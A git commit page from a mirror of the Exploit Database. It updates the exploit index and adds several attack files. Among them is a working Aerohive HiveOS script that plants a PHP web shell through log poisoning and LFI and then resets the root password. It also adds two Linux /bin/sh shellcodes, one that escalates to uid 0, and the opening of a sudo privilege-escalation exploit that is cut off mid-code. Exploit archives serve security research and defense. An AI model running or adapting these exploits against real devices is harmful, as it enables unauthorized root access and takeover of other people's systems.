bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-06-16

Browse source 
6 new exploits

Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation

Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)
Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without EggHunter) (Metasploit)
VX Search Enterprise 9.7.18 - Local Buffer Overflow
Sudo - 'get_process_ttyname()' Privilege Escalation

Win32 - JITed stage-0 Shellcode
Win32 - JITed Stage-0 Shellcode

Windows - JITed egg-hunter stage-0 Shellcode
Windows - JITed Egghunter Stage-0 Shellcode

Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal
Windows XP/Vista/7 - JITed Egghunter Stage-0 Shellcode Adjusted Universal

Linux/x86 - Egg-hunter Shellcode (31 bytes)
Linux/x86 - Egghunter Shellcode (31 bytes)

Linux/x86 - Egg-hunter Shellcode (20 bytes)
Linux/x86 - Egghunter Shellcode (20 bytes)

Linux/x86 - Egg-hunter Shellcode (13 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)

Linux/x86 - Egg-hunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)
Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)

AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)
AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)

Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution
This commit is contained in:
Offensive Security 2017-06-16 05:01:26 +00:00
parent f7178c7641
commit a090330e55
12 changed files with 501 additions and 33 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -5543,6 +5543,7 @@ id,file,description,date,author,platform,type,port
42169,platforms/android/dos/42169.txt,"LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free",2017-06-13,"Google Security Research",android,dos,0
42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0
42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0
42182,platforms/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -7005,7 +7006,7 @@ id,file,description,date,author,platform,type,port
17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local,0
17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without EggHunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0
17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local,0
17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' File Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0
17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
@ -9053,6 +9054,8 @@ id,file,description,date,author,platform,type,port
42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
42183,platforms/linux/local/42183.c,"Sudo - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15922,14 +15925,14 @@ id,file,description,date,author,platform,type,port
13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0
13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0
13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0
13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0
13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0
13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0
13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0
13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13645,platforms/windows/shellcode/13645.c,"Windows - JITed Egghunter Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0
13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - JITed Egghunter Stage-0 Shellcode Adjusted Universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
@ -16055,7 +16058,7 @@ id,file,description,date,author,platform,type,port
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell Port 4444 Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
@ -16085,7 +16088,7 @@ id,file,description,date,author,platform,type,port
36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
@ -16139,7 +16142,7 @@ id,file,description,date,author,platform,type,port
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
@ -16233,11 +16236,13 @@ id,file,description,date,author,platform,type,port
41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37664,7 +37669,7 @@ id,file,description,date,author,platform,type,port
41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
@ -38003,3 +38008,4 @@ id,file,description,date,author,platform,type,port
42167,platforms/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps,0
42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0
42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0
42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0

Can't render this file because it is too large.

7
platforms/hardware/remote/19882.pl
View file

@ -1,6 +1,7 @@
source: http://www.securityfocus.com/bid/1154/info
A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
#source: http://www.securityfocus.com/bid/1154/info
#
#A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash.
#
#!/usr/bin/perl

15
platforms/hardware/remote/20975.pl
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/2936/info
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
# source: http://www.securityfocus.com/bid/2936/info
#
# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
#
# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
#
# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
#
#!/usr/bin/perl
# modified roelof's uni.pl

2
platforms/hardware/remote/20976.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2936/info
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
@ -5,6 +6,7 @@ IOS is router firmware developed and distributed by Cisco Systems. IOS functions
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
*/
/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
* to compile:

15
platforms/hardware/remote/20977.pl
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/2936/info
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
# source: http://www.securityfocus.com/bid/2936/info
#
# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
#
# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
#
# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
#
#!/usr/bin/perl
#

15
platforms/hardware/remote/20978.pl
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/2936/info
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
# source: http://www.securityfocus.com/bid/2936/info
#
# IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
#
# It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
#
# This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service.
#
#!/usr/bin/perl

61
platforms/hardware/webapps/42178.py Executable file
View file

@ -0,0 +1,61 @@
#!/usr/bin/python3
# TARGET: AeroHive AP340 HiveOS < 6.1r5
# Confirmed working on AP340 HiveOS 6.1r2
# This program uses a local file inclusion vulnerability
# 1. Poison the log file in /var/log/messages by injecting PHP code into the
# username field of the login page
# 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
# 3. Login with SSH as root using password "password"
import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen
import urllib
# Payload to poison the log file at /var/log/messages
# Note if you mess up and get invalid syntax errors just reboot AP it
# will erase/rotate the logs
payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){ $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"</pre>$cmd<pre>\"; die; } ?>"
# URL of the login page where we will inject our PHP command exec code so it poisons the log file
post_url= "/login.php5?version=6.1r2"
post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
post_fields = urllib.parse.urlencode(post_fields)
data = post_fields.encode('ascii')
# Payload to call the injected PHP code
payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="
# Payload to change the root SSH user password
payload_command = "echo+root:password+|+/usr/sbin/chpasswd"
# Combined payload to change password using LFrI
payload_chpasswd = payload_lfi_url+payload_command
print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")
# Get target URL from user
print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
wap_ip = input(">>> ")
base_url = "http://" + wap_ip
# Poison log file with POST to login page
# json_data = json.dumps(post_fields).encode("utf8")
# request = urllib.request.Request(base_url+post_url, post_fields)
print ("Poisoning log file at /var/log/messages. . .")
request = urllib.request.Request(base_url+post_url, data)
json = urlopen(request).read().decode()
# Change the command with LFI->command execution
print("Interacting with PHP shell to change root password. . .")
content = urllib.request.urlopen(base_url+payload_chpasswd).read()
if "Password for " in content.decode('ascii'):
print("Success!")
print("Now try to log in with root:password via SSH!")
else:
print("Exploit Failed")

75
platforms/lin_x86-64/shellcode/42179.c Executable file
View file

@ -0,0 +1,75 @@
/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 14/06/2017
;Architecture: Linux x86_64
;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
##########
# Source #
##########
section .text
global _start
_start:
push rax
xor rdx, rdx
xor rsi, rsi
mov rbx,'/bin//sh'
push rbx
push rsp
pop rdi
mov al, 59
syscall
#################################
# Compile and execute with NASM #
#################################
nasm -f elf64 sh.s -o sh.o
ld sh.o -o sh
#########################
# objdump --disassemble #
#########################
Disassembly of section .text:
0000000000400080 <_start>:
400080: 50 push %rax
400081: 48 31 d2 xor %rdx,%rdx
400084: 48 31 f6 xor %rsi,%rsi
400087: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
40008e: 2f 73 68
400091: 53 push %rbx
400092: 54 push %rsp
400093: 5f pop %rdi
400094: b0 3b mov $0x3b,%al
400096: 0f 05 syscall
######################
# 24 Bytes Shellcode #
######################
\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05
########
# Test #
########
gcc -fno-stack-protector -z execstack shell.c -o shell
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}

76
platforms/lin_x86/shellcode/42177.c Executable file
View file

@ -0,0 +1,76 @@
;Title: Linux/x86 - 66 byte - execve(/bin/sh) - setuid(0) - setgid(0) - XOR encrypted
;Author: nullparasite
;Contact: nullparasite@protonmail.ch
;Category: Shellcode
;Architecture: Linux x86
;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR encrypted.
;Tested on: Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
====================================================================
global _start
section .text
_start:
jmp entrypoint ; jump immd.
prepare:
pop esi ; address of string -> esi
xor eax, eax ; clear eax
xor ecx, ecx ; ecx
mov BYTE [esi+7], al ; terminate string, str[7] = NULL
lea ebx, [esi] ; put address of string -> ebx
mov DWORD [esi + 8], ebx ; replace first 4-# with string
mov DWORD [esi + 12], eax ; replace last 4-# with NULL
mov BYTE cl, 7 ; set counter to 7
decode:
xor BYTE [esi + ecx - 1], 0x3 ; s[cl-1] = s[cl-1] ^ 3
sub cl, 1 ; dec count by 1
jnz decode ; jump if not zero
priv_setuid:
xor ebx, ebx ; clear ebx, setuid(0)
mov al, 0x17 ; setuid = 0x17
int 0x80 ; trap
priv_setgid:
xor ebx, ebx ; clear ebx, setgid(0)
mov al, 0x2e ; setgid = 0x2e
int 0x80 ; trap
shell:
mov BYTE al, 0x0b ; execve = 0x0b
mov ebx, esi ; arg1, /bin/sh
lea ecx, [esi + 8] ; arg2, p[0] = /bin/sh, p[1] = NULL
lea edx, [esi + 12] ; arg3, pointer to NULL
int 0x80 ; trap
entrypoint:
call prepare ; call prepare
db ',ajm,pk#########' ; store string on the stack
====================================================================
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
#include<stdio.h>
unsigned char code[] = "\xeb\x34\x5e\x31\xc0\x31\xc9\x88\x46\x07\x8d"
"\x1e\x89\x5e\x08\x89\x46\x0c\xb1\x07\x80\x74"
"\x0e\xff\x03\x80\xe9\x01\x75\xf6\x31\xdb\xb0"
"\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8"
"\xc7\xff\xff\xff\x2c\x61\x6a\x6d\x2c\x70\x6b";
typedef int(*shellcode_t)();
int main(){
shellcode_t ret = (shellcode_t)code;
ret();
}
====================================================================

151
platforms/linux/local/42183.c Executable file
View file

@ -0,0 +1,151 @@
/*
* E-DB Note: http://www.openwall.com/lists/oss-security/2017/05/30/16
* E-DB Note: http://seclists.org/oss-sec/2017/q2/470
*
* Linux_sudo_CVE-2017-1000367.c
* Copyright (C) 2017 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <paths.h>
#include <pty.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define SUDO_BINARY "/usr/bin/sudo"
#define TARGET_FILE "/etc/init.d/README"
#define SELINUX_ROLE "unconfined_r"
#define WORKING_DIR "/dev/shm/_tmp"
#define TTY_SYMLINK WORKING_DIR "/_tty"
#define TTY_SYMLINK_ TTY_SYMLINK "_"
#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
int
main(const int my_argc, const char * const my_argv[])
{
if (my_argc <= 1) die();
if (my_argc >= INT_MAX/2) die();
char comm[sizeof(WORKING_DIR) + 16];
char pts[PATH_MAX];
#define PTS_NUM 32
int pts_fds[2 * PTS_NUM];
unsigned int i = PTS_NUM;
while (i--) {
int ptm_fd;
if (openpty(&ptm_fd, &pts_fds[i], pts, NULL, NULL)) die();
if (close(ptm_fd)) die();
}
struct stat sbuf;
if (fstat(*pts_fds, &sbuf)) die();
if (!S_ISCHR(sbuf.st_mode)) die();
if (sbuf.st_rdev <= 0) die();
if ((unsigned int)snprintf(comm, sizeof(comm), "%s/ %lu ", WORKING_DIR, (unsigned long)sbuf.st_rdev)
>= sizeof(comm)) die();
for (i = 0; i < PTS_NUM; i++) {
if (close(pts_fds[i])) die();
}
if (mkdir(WORKING_DIR, 0700)) die();
if (symlink(pts, TTY_SYMLINK)) die();
